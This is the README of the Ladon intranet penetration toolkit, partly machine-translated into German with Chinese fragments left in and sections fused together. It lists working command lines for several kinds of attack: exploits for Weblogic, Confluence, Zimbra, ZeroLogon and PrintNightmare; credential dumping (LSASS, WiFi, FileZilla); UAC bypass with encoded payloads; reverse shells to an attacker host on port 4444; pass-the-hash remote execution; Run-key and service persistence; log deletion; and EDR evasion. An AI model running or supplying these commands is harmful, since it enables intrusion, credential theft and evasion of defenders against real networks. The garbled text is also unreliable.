
Ladon – großer Intranet-Penetrationstest-Scanner, PowerShell- und Cobalt-Strike-Plugin, In-Memory-Loading, dateiloses Scannen. Enthält Port-Scanning, Diensterkennung, Erkennung von Netzwerk-Assets, Passwort-Audit, Erkennung von Hochrisiko-Schwachstellen, Exploit-Ausführung, Passwort-Extraktion sowie Ein-Klick-GetShell. Unterstützt Batch-Scans für A-/B-/C-Netzsegmente sowie segmentübergreifende Scans und unterstützt URL-, Host- und Domain-Listenscans usw. Die Netzwerk-Asset-Erkennung nutzt 32 Protokolle (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) oder Methoden, um schnell IP-Adressen aktiver Hosts im Zielnetzwerk, Computernamen, Arbeitsgruppen, freigegebene Ressourcen, Netzwerkadapter-Adressen, Betriebssystemversionen, Websites, Subdomains, Middleware, offene Dienste, Router, Switches, Datenbanken, Drucker usw. zu ermitteln. Zahlreiche Module zur Erkennung von Hochrisiko-Schwachstellen: MS17010, Zimbra, Exchange.

Ladon großer Intranet-Penetrationsscanner\Domänen-Penetration\horizontale Tools, PowerShell-Modul, Cobalt Strike Plugin, Speicherladen, dateiloser Scan. Enthält Port-Scan, Service-Identifikation, Netzwerkasset-Erkennung, Passwort-Audit, Entdeckung von Hochrisiko-Schwachstellen, Exploit, Passwortlesen und One-Click GetShell, unterstützt Batch-A/B/C-Segment und netzwerksegmentübergreifende Scans, unterstützt URL, Host, Domainenlisten-Scans usw. Version 12.2 enthält 262 Funktionsmodule, Netzwerkasset-Erkennungsmodule mit 30+ Protokollen (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) sowie Methoden zur schnellen Erfassung von Zielnetzwerk-IPs, Computernamen, Arbeitsgruppen, gemeinsam genutzten Ressourcen, Netzwerkadressen, Betriebssystemversionen, Websites, Subdomains, Middleware, offenen Diensten, Routern, Switches, Datenbanken, Druckern usw., Entdeckung von Hochrisiko-Schwachstellen 16+ einschließlich Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2-Serie, Printer usw., Passwort-Audit 25+ einschließlich Datenbanken (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows (LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar usw., Remote-Befehlsausführung (smbexec/wmiexe/psexec/atexec/sshexec/webshell), Web-Fingerabdruck-Erkennungsmodul erkennt 135+ (Webanwendungen, Middleware, Skripttypen, Seitentypen) usw., lokale Privilegienausweitung 21+ inklusive SweetPotato\BadPotato\EfsPotato\BypassUAC, hochgradig anpassbare Plugin-POC-Unterstützung für .NET-Assemblys, DLL (C#/Delphi/VC), PowerShell usw., Unterstützung für den Batch-Aufruf beliebiger externer Programme oder Befehle über Konfigurations-INI, EXP-Generator kann mit einem Klick Schwachstellen-POC/EXP generieren, um die Scan-Fähigkeiten schnell zu erweitern, Ladon unterstützt Cobalt Strike pluginifizierten Speicherladen, dateiloses Scannen des Intranets für schnelle horizontale Bewegung.
https://github.com/k8gege/Ladon/releases https://k8gege.org/Download
### Einfache Bedienung
Obwohl Ladon viele Funktionen bietet, ist die Bedienung sehr einfach und jeder kann leicht loslegen<br>
Mit nur einem oder zwei Parametern können 90% der Funktionen genutzt werden. Ein Modul entspricht einem neuen Werkzeug
### Laufzeitumgebung
#### Windows
Ladon kann unter Windows mit .NET 2.0 oder höher verwendet werden (ab Windows 7 ist .NET integriert).<br>
Z. B. Cmd, PowerShell, Remote-Cmd, WebShell usw. sowie In-Memory-Laden in Cobalt Strike.<br>
Ladon.ps1 ist voll kompatibel mit PowerShell von Windows 7 bis Windows 11/2025, ermöglicht dateiloses Remote-Laden ohne Versionsprüfung.
#### Plattformübergreifend: LadonGo unterstützt Linux, Mac, Arm, MIPS
Plattformübergreifend: Linux, macOS, Windows, Router, Netzwerkgeräte usw.<br>
https://github.com/k8gege/LadonGo
### Besondere Bedingungen
In der Praxis läuft es nicht immer reibungslos. Manche internen Netzwerk-Weiterleitungen sind langsam oder unmöglich, sodass das Tool auf das Ziel hochgeladen werden muss.<br>
Manchmal dauert es ewig, selbst eine 2-3 MB große Datei hochzuladen, oder es klappt gar nicht. Von Python-Dateien mit mehreren zehn MB ganz zu schweigen.<br>
Ladon ist in C# entwickelt, die Programmgröße beträgt nur etwa 500 KB. Selbst wenn die Verbindung schlecht ist, kann man eine 500 KB große Datei hochladen.<br>
Falls nicht, kann man es per PowerShell remote im Speicher laden – das ist ein Vorteil gegenüber großen kompilierten Programmen in Python oder Go.
### Leitbild
Rundum-Service: Den Benutzern ein einfach zu bedienendes, funktionsreiches und hochflexibles Scan-Tool bieten.
### Merkmale
Geringer Scan-Traffic<br>
Kleine Programmgröße<br>
Reichhaltige und leistungsstarke Funktionen<br>
Einfach und benutzerfreundlich<br>
Plugins unterstützen mehrere Sprachen<br>
Plattformübergreifend (Windows/Kali/Ubuntu) usw.<br>
Unterstützt Cobalt Strike als Plugin<br>
Unterstützt dateilose PowerShell-Penetration<br>
Exp-Generator kann mit einem Klick Pocs erstellen<br>
Mehrere Versionen für verschiedene Umgebungen
### Programmparameter und Funktionen
1 Unterstützt Scannen einer bestimmten IP-Adresse<br>
2 Unterstützt Scannen eines bestimmten Domainnamens<br>
3 Unterstützt Scannen eines bestimmten Rechnernamens<br>
4 Unterstützt Scannen eines bestimmten C-Segments (ip/24)<br>
5 Unterstützt Scannen eines bestimmten B-Segments (ip/16)<br>
6 Unterstützt Scannen eines bestimmten A-Segments (ip/8)<br>
7 Unterstützt Scannen einer bestimmten URL<br>
8 Unterstützt Batch-IP-Scan (ip.txt)<br>
9 Unterstützt Batch-C-Segment-Scan (ip24.txt)<br>
10 Unterstützt Batch-C-Segment-Scan (ipc.txt)<br>
11 Unterstützt Batch-B-Segment-Scan (ip16.txt)<br>
12 Unterstützt Batch-URL-Scan (url.txt)<br>
13 Unterstützt Batch-Domain-Scan (domain.txt)<br>
14 Unterstützt Batch-Rechnernamen-Scan (host.txt)<br>
15 Unterstützt Batch-Länder-Segment-Scan (cidr.txt)<br>
16 Unterstützt Batch-String-Liste (str.txt)<br>
17 Unterstützt Host-Benutzername/Passwort-Liste (check.txt)<br>
18 Unterstützt Benutzer-/Passwort-Liste (userpass.txt)<br>
19 Unterstützt Scannen eines bestimmten C-Segment-Bereichs<br>
20 Unterstützt Laden benutzerdefinierter DLLs per Parameter (nur C#)<br>
21 Unterstützt Laden benutzerdefinierter EXEs per Parameter (nur C#)<br>
22 Unterstützt Laden benutzerdefinierter INI-Konfigurationsdateien per Parameter<br>
23 Unterstützt Laden benutzerdefinierten PowerShell-Codes per Parameter<br>
24 Unterstützt benutzerdefinierte Programme (Systembefehle oder Drittanbieter-Programme, d. h. in beliebigen Sprachen entwickelte Programme oder Skripte)<br>
25 Plugins (unterstützt mehrere Sprachen: C#/Delphi/Golang/Python/VC/PowerShell)<br>
26 Unterstützt Cobalt Strike (Scannen des internen Netzwerks des Ziels über Beacon-Befehlszeile oder Scannen externer Ziele über Sprungbrett)<br>
27 Unterstützt IP-Scan im CIDR-Format, z. B. 100.64.0.0/10, 192.168.1.1/20 usw.<br>
28 INI-Konfiguration unterstützt Passwort-Brute-Force für benutzerdefinierte Programme<br>
### Kurzanleitung
Ladon-Kurzanleitung und vollständige Dokumentation: http://k8gege.org/Ladon <br>
Excel-Modulfunktionsdokument: http://k8gege.org/Ladon/wiki.xlsx <br>
Unterstützt In-Memory-Laden in Cmd, Cobalt Strike, PowerShell usw.<br>
Windows-Version: .NET, Cobalt Strike, PowerShell<br>
Systemübergreifende Versionen: Go (alle Plattformen), Python (theoretisch alle Plattformen)<br>
PS: Study erleichtert das lokale Lernen, für vollständige Funktionen bitte CMD verwenden.
### BypassEDR-Scan
Standardmäßig ist die Scangeschwindigkeit hoch. Manche WAFs oder EDRs haben eine starke Abwehr.<br>
Selbst mit wenigen Threads kann es sein, dass der Scan nach etwa 20 Minuten blockiert wird.<br>
BypassEDR simuliert menschlichen Zugriff, um Geschwindigkeitserkennungsstrategien zu umgehen.<br>
Die Scangeschwindigkeit ist langsamer. Wer auf Schnelligkeit aus ist, sollte es nicht verwenden.<br>```Bash
Ladon 10.1.2.8/24 MS17010 bypassEDR
密码爆破相关模块暂不支持bypassEDR参数
例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:```Bash
Ladon 10.1.2.8/24 MS17010 t=1
80 Threads:```Bash
Ladon noping 10.1.2.8/24 MS17010 t=80
Unter starkem Schutz die Scanthread-Einstellungen niedriger setzen, F Einzelthread
```Bash
Ladon 10.1.2.8/24 MS17010 f=1
### 002 Socks5-Proxy-Scan
Beispiel: Scannen des Zielsegments 10.1.2 mit 8 Threads auf die MS17010-Schwachstelle<br>```Bash
Ladon noping 10.1.2.8/24 MS17010 t=8
Siehe: http://k8gege.org/Ladon/proxy.html
PS: Der Proxy unterstützt kein Socks5, daher muss der Parameter noping für den Scan hinzugefügt werden
Egal ob Frp oder andere ähnliche Tools, hauptsächlich unterstützen Tools wie Proxifier das ICMP-Protokoll nicht
Weil Ladon standardmäßig zuerst mit ICMP die Erreichbarkeit prüft, bevor es entsprechende Module testet
Daher muss in einer Proxy-Umgebung der Ping-Scan deaktiviert werden, da der System-Ping das ICMP-Protokoll verwendet.
CIDR-Format: nicht nur /24/16/8 (alle)```Bash Ladon 192.168.1.8/24 扫描模块 Ladon 192.168.1.8/16 扫描模块 Ladon 192.168.1.8/8 扫描模块
Buchstabenformat: nur Abschnitt C, Abschnitt B, Abschnitt A, in Reihenfolge sortiert```Bash
Ladon 192.168.1.8/c 扫描模块
Ladon 192.168.1.8/b 扫描模块
Ladon 192.168.1.8/a 扫描模块
Ladon 192.168.1.50-192.168.1.200 ICMP
#### ICMP-Erkennung von aktiven Hosts 1.30 bis 50.80```Bash
Ladon 192.168.1.30-192.168.50.80 ICMP
TXT-Format
Ladon ip24.txt ICMP Ladon ipc.txt ICMP
##### 005 ICMP-Massen-Scan der Liste aktiver Hosts im B-Segment```Bash
Ladon ip16.txt ICMP
Ladon cidr.txt ICMP
##### 007 ICMP-Massenscan zur Prüfung der Erreichbarkeit von Domains```Bash
Ladon domain.txt ICMP
Ladon host.txt ICMP
##### 009 WhatCMS Massenidentifikation von CMS, Bannern, SSL-Zertifikaten, Titeln; kann unbekannte CMS, Router, Drucker, Netzwerkgeräte, Kameras usw. identifizieren```Bash
Ladon 192.168.1.8 WhatCMS 扫描IP
Ladon 192.168.1.8/24 WhatCMS 扫描C段
Ladon 192.168.1.8/C WhatCMS 扫描C段
Ladon 192.168.1.8/B WhatCMS 扫描B段
Ladon 192.168.1.8/A WhatCMS 扫描A段
Ladon IP.TXT WhatCMS 扫描IP列表
Ladon IP24.TXT WhatCMS 扫描C段列表
Ladon IP16.TXT WhatCMS 扫描B段列表
Ladon cidr.TXT WhatCMS 扫描整个国家IP段列表
禁PING扫描<br>
Ladon noping 192.168.1.8 WhatCMS 扫描IP
Ladon noping 192.168.1.8/24 WhatCMS 扫描C段
Ladon url.txt DraytekPoc
##### 011 Massenentschlüsselung von Base64-Passwörtern```Bash
Ladon str.txt DeBase64
Ladon 192.168.1.8/24 ICMP
##### 013 Ping-Erkennung aktiver Hosts (Aufruf des systemeigenen Ping-Befehls, Anzeige von ms, ttl usw.)```Bash
Ladon 192.168.1.8/24 Ping
Wenn du der Meinung bist, dass ein Host nur dann erreichbar ist, wenn der Ping-Befehl erfolgreich ist, kannst du diesen Befehl für die Batch-Verarbeitung verwenden.
Ladon 192.168.1.8/24 OnlinePC
##### 015 Mehrprotokoll-Erkennung des Betriebssystems (IP, Maschinenname, Betriebssystemversion, offene Dienste)```Bash
Ladon 192.168.1.8/24 OsInfo
Ladon 192.168.1.8/24 EthInfo Ladon 192.168.1.8/24 OxidInfo
##### 017 DNS-Erkennung von Multi-NIC-Hosts```Bash
Ladon 192.168.1.8/24 DnsInfo
Ladon 192.168.1.8/24 OnlineIP
##### 019 Scan der SMB-Schwachstelle MS17010 (IP, Hostname, Schwachstellennummer, Betriebssystemversion)```Bash
Ladon 192.168.1.8/24 MS17010
Ladon 192.168.1.8/24 SMBGhost
##### 021 Web-Titel und Banner scannen – Für vollständigere Informationen verwenden Sie das WhatCMS-Modul```Bash
Ladon 192.168.1.8/24 WebInfo
Ladon http://192.168.1.8 WebInfo
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
Ladon 192.168.1.8/24 UrlScan
##### 023 URLs und Domains von Sites im C-Netzwerksegment scannen```Bash
Ladon 192.168.1.8/24 SameWeb
Ladon baidu.com SubDomain
##### 025 Domain-Name-Resolution-IP, Hostname-Resolution-IP```Bash
Ladon baidu.com DomainIP
Ladon baidu.com HostIP
Ladon domain.txt DomainIP Ladon host.txt HostIP
##### 025 Batch-Auflösung von Domainnamen und Hostnamen – Ergebnis nur IP```Bash
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
Ladon AdiDnsDump 192.168.1.8
##### 027 Maschinen und IPs im Domänenbereich abfragen (bedingt innerhalb der Domäne)
Ladon GetDomainIP
##### 028 C-Segment-Ports scannen, bestimmte Ports scannen```Bash
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
Ladon 192.168.1.8/24 CMS Ladon 192.168.1.8/24 CmsInfo Ladon 192.168.1.8/24 WhatCMS
##### 030 Cisco-Geräte scannen```Bash
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
Ladon EnumMssql
##### 032 Enumeration von Netzwerkfreigaben (Domäne, IP, Hostname\Freigabepfad)```Bash
Ladon EnumShare
Ladon 192.168.1.8/24 LdapInfo
##### 034 FTP-Server scannen und Version identifizieren```Bash
Ladon 192.168.1.8/24 FtpInfo
Passwortknacken Details siehe SSH: http://k8gege.org/Ladon/sshscan.html
Ladon 192.168.1.8/24 SmbScan
##### 036 Port 135 Wmi Passwort-Brute-Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiScan
Ladon 192.168.1.8/24 LdapScan
##### 038 Port 5985 WinRM Passwort-Brute-Force (Windows)```Bash
Ladon 192.168.1.8/24 WinrmScan
Ladon 192.168.1.8/24 SmbHashScan
##### 040 Port 135 Wmi NTLM HASH Brute Force (Windows)```Bash
Ladon 192.168.1.8/24 WmiHashScan
Ladon 192.168.1.8/24 SshScan Ladon 192.168.1.8:22 SshScan
##### 042 1433端口 Mssql数据库密码爆破```Bash
Ladon 192.168.1.8/24 MssqlScan
Ladon 192.168.1.8/24 OracleScan
Oracle-Datenbanken sind besonders: Wenn nur die ORCL-Datenbank geprüft wird, werden viele Berechtigungen übersehen.<br>
Näheres unter: http://k8gege.org/Ladon/OracleScan.html<br>
##### 044 Port 3306 MySQL-Datenbank-Passwort-Cracking```Bash
Ladon 192.168.1.8/24 MysqlScan
Ladon http://192.168.1.8:7001/console WeblogicScan Ladon 192.168.1.8/24 WeblogicScan
##### 046 5900 Port VNC Remote Desktop Passwort-Brute-Force```Bash
Ladon 192.168.1.8/24 VncScan
Ladon 192.168.1.8/24 FtpScan
##### 048 Port 8080 Tomcat Backend Anmelde-Passwort Brute-Force```Bash
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
Ladon http://192.168.1.8/login HttpBasicScan Ladon ip.txt 401Scan
##### 052 Port 139 NetBIOS-Protokoll Windows-Passwort-Brute-Force```Bash
Ladon 192.168.1.8/24 NbtScan
Ladon 192.168.1.8/24 WinrmScan
##### 054 IP-Kamera-Passwort-Cracking (voreingestellte Standardpasswörter)```Bash
Ladon 192.168.1.8/24 DvrScan
Ladon 192.168.1.8/24 MS17010
##### 056 SMBGhost-Schwachstellenerkennung CVE-2020-0796 911 reserviert```Bash
Ladon 192.168.1.8/24 SMBGhost
Ladon 192.168.1.8/24 WeblogicPoc
##### 058 PhpStudy Backdoor-Erkennung (phpstudy 2016/phpstudy 2018) 10.9 entfernt 911 behalten```Bash
Ladon 192.168.1.8/24 PhpStudyPoc
Ladon 192.168.1.8/24 ActivemqPoc
##### 060 Tomcat-Schwachstellenerkennung (CVE-2017-12615)```Bash
Ladon 192.168.1.8/24 TomcatPoc
Ladon 192.168.1.8/24 Struts2Poc
##### 062 DraytekPoc CVE-2020-8515 Schwachstellenerkennung, Draytek-Versionserkennung, Erkennung schwacher Passwörter```Bash
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc
Ladon 192.168.1.8/24 CVE-2024-55591
### Schwachstellenausnutzung/Exploit

##### 063 Weblogic-Exploit (CVE-2019-2725)```Bash
Ladon 192.168.1.8/24 WeblogicExp
Ladon 192.168.1.8/24 TomcatExp
##### 065 Allgemeiner DLL-Injection-CMD-Generator für Windows 0day-Schwachstellen (DLL nur 5KB)```Bash
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=
Ladon CVE-2021-40444 MakeCab poc.dll Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
##### 067 DraytekExp CVE-2020-8515 Remote-Befehlsausführung EXP```Bash
Ladon DraytekExp http://192.168.1.8 whoami
Ladon ZeroLogon dc.k8gege.org
##### 069 CVE-2020-0688 Exchange-Serialisierungsschwachstelle (.net 4.0)```Bash
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
Ladon ForExec "CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt" 80 "Exploit finnished"
### Dateidownload, Dateiübertragung
##### 071 Intranet-Dateiübertragung HTTP-Download HTTPS-Download MSF-Download```Bash
Ladon wget https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe
### Ver- und Entschlüsselung (HEX/Base64)
##### 073 Hex Ver- und Entschlüsselung```Bash
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64-Verschlüsselung und -Entschlüsselung```Bash Ladon 123456 EnBase64 Ladon MTIzNDU2 DeBase64 Ladon str.txt DeBase64
### Netzwerk-Sniffing
##### 075 FTP-Passwort-Sniffing (Bindet an lokale IP, automatisches Sniffing des C-Subnetzes)
Maschine mit mehreren Netzwerkkarten, snifft die entsprechenden C-Subnetz-IPs```Bash
Ladon FtpSniffer 192.168.1.5
Maschinen mit mehreren Netzwerkkarten sniffen die entsprechenden C-Segment-IPs.```Bash Ladon HTTPSniffer 192.168.1.5
##### 077 Netzwerk-Sniffing```Bash
Ladon Sniffer
Ladon IISpwd
##### 079 Verbundene WIFI-Passwörter auslesen```Bash
Ladon WifiPwd
Ladon FileZillaPwd
##### 081 Lesen von System-Hash, VPN-Passwort, DPAPI-Key 10.9 entfernt```Bash
Ladon CVE-2021-36934
Ladon DumpLsass
### Informationssammlung

##### 083 API aktuellen Benutzer anzeigen```Bash
Ladon w
Ladon whoami
Ladon GetIP Ladon IPinfo
##### 084 Abrufen PCname GUID CPUID DiskID Mac-Adresse```Bash
Ladon GetID
Ladon Recent
##### 086 Anzeige von USB-Stick- und USB-Nutzungsaufzeichnungen (USB-Name, USB-Kennzeichen, Pfadinformationen)```Bash
Ladon UsbLog
Ladon CheckDoor Ladon AutoRun
##### 088 Prozessdetails (Programmpfad, Bitanzahl, Startparameter, Benutzer)```Bash
Ladon EnumProcess
Ladon Tasklist
Ladon cmdline Ladon cmdline cmd.exe
##### 090 Grundlegende Penetrationsinformationen abrufen```Bash
Ladon GetInfo
Ladon GetInfo2
Ladon NetVer Ladon PSver Ladon NetVersion Ladon PSversion
##### 092 Laufzeitversion & Kompilierungsumgebung```Bash
Ladon Ver
Ladon Version
Ladon AllVer Ladon AllVersion
##### 094 IE-Proxy-Informationen anzeigen```Bash
Ladon QueryProxy
Ladon DirList
###### Laufwerk oder Verzeichnis angeben```Bash
Ladon DirList c:\
Ladon QueryAdmin
##### 097 Lokale Named Pipes anzeigen```Bash
Ladon GetPipe
Ladon RdpLog
### Remote-Ausführung (psexec/wmiexec/atexec/sshexec/smbexec)

##### 099 445 Port Verschlüsselte PSEXEC Remote-Befehlsausführung (interaktiv)```Bash
net use \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 101 Port 445 AtExec Remote Command Execution (Non-Interactive)```Bash
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
##### 103 JspShell Remote-Befehlausführung (nicht-interaktiv) 9.3.0 entfernt
Verwendung:Ladon JspShell type url pwd cmd```Bash
Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami 获取系统版本信息 方便提权 Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo
##### 105 135 Port WmiExec2 Remote Command Execution unterstützt HASH (nicht interaktiv) unterstützt Datei-Upload```Bash
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami 先Mimikatz注入Hash,再pth执行命令
Base64Cmd for Cobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe 先Mimikatz注入Hash,再pth执行命令
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
##### 107 WinrmExec Remote-Befehlsausführung ohne Rückmeldung (unterstützt Systemrechte)```Bash
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe
Ladon whoami
##### 109 6 Arten von Whitelist-BypassUAC (nach 8.0) Win7-Win10 Entfernt in Version 10.8, nur 911 beibehalten
Verwendung: Ladon BypassUAC Method Base64Cmd```Bash
Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
Ladon BypassUac2 c:\1.exe Ladon BypassUac2 c:\1.bat
##### 111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) Drucker-Schwachstellen-Privilegien-Eskalations-Exploit```Bash
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
Ladon SpoolFool poc.dll Ladon CVE-2022-21999 poc.dll
##### 113 GetSystem Systemrechte erlangen und CMD ausführen```Bash
Ladon GetSystem cmd.exe
Ladon GetSystem cmd.exe explorer
##### 115 Runas – Befehle als Benutzer ausführen```Bash
Ladon Runas user pass cmd
Ladon ms16135 whoami >=9.2.1版本移除 911保留
##### 117 BadPotato Dienstbenutzer Privilegieneskalation auf SYSTEM```Bash
Ladon BadPotato cmdline
Ladon SweetPotato cmdline
##### 119 EfsPotato Win7-2019 Privilege Escalation (Dienstbenutzerberechtigung auf System)```Bash
Ladon EfsPotato whoami
Ladon Open3389
##### 121 Aktivieren des integrierten Administrators```Bash
Ladon ActiveAdmin
Ladon ActiveGuest
### Reverse Shell
##### 123 Reverse TCP NC Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 nc
Ladon ReverseTcp 192.168.1.8 4444 shell
##### 125 Reverse TCP MSF MET Shell```Bash
Ladon ReverseTcp 192.168.1.8 4444 meter
Ladon ReverseHttp 192.168.1.8 4444
##### 127 Reverse HTTPS MSF MET Shell```Bash
Ladon ReverseHttps 192.168.1.8 4444
Ladon PowerCat 192.168.1.8 4444 cmd Ladon PowerCat 192.168.1.8 4444 psh
##### 129 Reverse UDP Cmd & PowerShell Shell```Bash
Ladon PowerCat 192.168.1.8 4444 cmd udp
Ladon PowerCat 192.168.1.8 4444 psh udp
Ladon netsh add 888 192.168.1.112 22
##### 131 PortTran Portweiterleitung(3389 Beispiel)```Bash
VPS监听: Ladon PortTran 8000 338
目标转发: Ladon PortTran 内网IP 3389 VPS_IP 8000
本机连接: mstsc VPS_IP:338
Ladon RdpHijack 3 Ladon RdpHijack 3 console
##### 133 Registry-Run-Starteintrag hinzufügen```Bash
Ladon RegAuto Test c:\123.exe
Ladon at c:\123.exe Ladon at c:\123.exe gui
##### 135 SC-Dienst Starteintrag hinzufügen & Programm ausführen (SYSTEM-Berechtigung)```Bash
Ladon sc c:\123.exe
Ladon sc c:\123.exe gui
Ladon sc c:\123.exe auto ServerName
Ladon 192.168.1.8/24 SnmpInfo
##### 137 Nbt-Protokoll zur Erkennung von Windows-Hostnamen, Domäne, Benutzer```Bash
Ladon 192.168.1.8/24 NbtInfo
Ladon 192.168.1.8/24 SmbInfo
##### 139 Wmi协议 zur Ermittlung von Windows-Version, Hostname, Domäne```Bash
Ladon 192.168.1.8/24 WmiInfo
Ladon 192.168.1.8/24 MssqlInfo
##### 141 Winrm-Protokoll zur Erkennung von Windows-Version, Hostname, Domäne```Bash
Ladon 192.168.1.8/24 WinrmInfo
Ladon 192.168.1.8/24 ExchangeInfo
##### 143 Rdp-Protokoll zur Erkennung von Windows-Version, Hostname und Domäne```Bash
Ladon 192.168.1.8/24 RdpInfo
Ladon EnableDotNet
##### 145 HTML-Quellcode der internen Website abrufen```Bash
Ladon gethtml http://192.168.1.1
Ladon web 80 Ladon web 80 dir
获取外网IP(VPS上启动WEB,目标访问ip.txt或ip.jpg)
http://192.168.1.8/ip.txt
##### 147 getstr/getb64/debase64/savetxt(无回显漏洞回显结果)
##### 监听```Bash
Ladon web 800
certutil.exe -urlcache -split -f http://192.168.1.8:800/getstr/test123456
##### Base64-Verschlüsselungsergebnis```Bash
certutil.exe -urlcache -split -f http://192.168.1.110:800/getbase64/k8gege520
certutil.exe -urlcache -split -fhttp://192.168.1.110:800/debase64/azhnZWdlNTIw
##### 148 Shiro-Plugin-Erkennung```Bash
Ladon 192.168.1.8/24 IsShiro
Ladon LogDelTomcat access.log 192.168.1.8
##### 150 C#-Scan für benutzerdefinierte Assembly-Plugins```Bash
Ladon 192.168.1.8/24 Poc.exe
Ladon 192.168.1.8/24 *.dll(c#)
Ladon ReadFile c:\k8.exe 默认1k Ladon ReadFile c:\k8.exe 1K Ladon ReadFile c:\k8.exe 1024K Ladon ReadFile c:\k8.exe 1M
##### 152 Ändern der Registrierung zum Lesen von Klartext-Passwörtern bei Systemen ab 2012```Bash
Ladon SetMzLogonPwd 1
Ladon SetSignAuth 1
##### 154 IP24 Batch-Konvertierung von IPs in ip24-Format(192.168.1.1/24)```Bash
Ladon ip.txt IP24
Ladon ip.txt IPC
##### 156 IPB Batch-Konvertierung von IPs in das IP B-Format (192.168.)```Bash
Ladon ip.txt IPB
Ladon url.txt CVE-2022-26134
##### 158 Atlassian Confluence CVE-2022-26134 Exploit```Bash
Ladon EXP-2022-26134 https://111.123.123.123 id
Ladon RevShell-2022-26134 TargetURL VpsIP VpsPort Ladon RevShell-2022-26134 http://xxx.com:8090 123.123.123.123 4444
##### 160 SslInfo Zertifikatserkennung für Geräte, IPs, Domänen, Rechnernamen, Organisationsinformationen usw.```Bash
Ladon https://k8gege.org SslInfo
Ladon k8gege.org SslInfo
Ladon k8gege.org:443 SslInfo 指定端口
Ladon noping fbi.gov SslInfo 禁ping探测
Ladon 192.168.1.1 SslInfo
Ladon 192.168.1.1:8443 SslInfo
Ladon ip.txt SslInfo Ladon url.txt SslInfo Ladon 192.168.1.1/c SslInfo Ladon 192.168.1.1/b SslInfo
##### 162 WPinfo Mehrere Methoden zum Abrufen der WordPress-Kern-, Theme- und Plugin-Versionen```Bash
Ladon https://k8gege.org WPinfo
Ladon k8gege.org WPinfo
Ladon noping fbi.gov WPinfo 禁ping探测
Ladon 192.168.1.1 WPinfo
Ladon 192.168.1.1:8443 WPinfo
Ladon ip.txt WPinfo Ladon url.txt WPinfo Ladon 192.168.1.1/c WPinfo Ladon 192.168.1.1/b WPinfo
##### 164 Exchange-Brute-Force Erkennung von Exchange-Passwort-Brute-Force```Bash
Ladon k8gege.org ExchangeScan
Ladon 192.168.1.8 ExchangeScan
Ladon 192.168.1.8、24 ExchangeScan
Ladon 192.168.1.8 CVE-2022-27925 Ladon http://zimbra.k8gege.org CVE-2022-27925 Ladon ip.txt CVE-2022-27925 Ladon url.txt CVE-2022-27925 Ladon 192.168.1.1/c CVE-2022-27925 Ladon 192.168.1.1/b CVE-2022-27925
##### 166 EXP-2022-27925 Zimbra Mail Server Unauthorized RCE Vulnerability EXP GetShell```Bash
Ladon EXP-2022-27925 https://zimbra.k8gege.org poc.zip
Ladon WebShell jsp ua https://zimbra.k8gege.org pass whoami
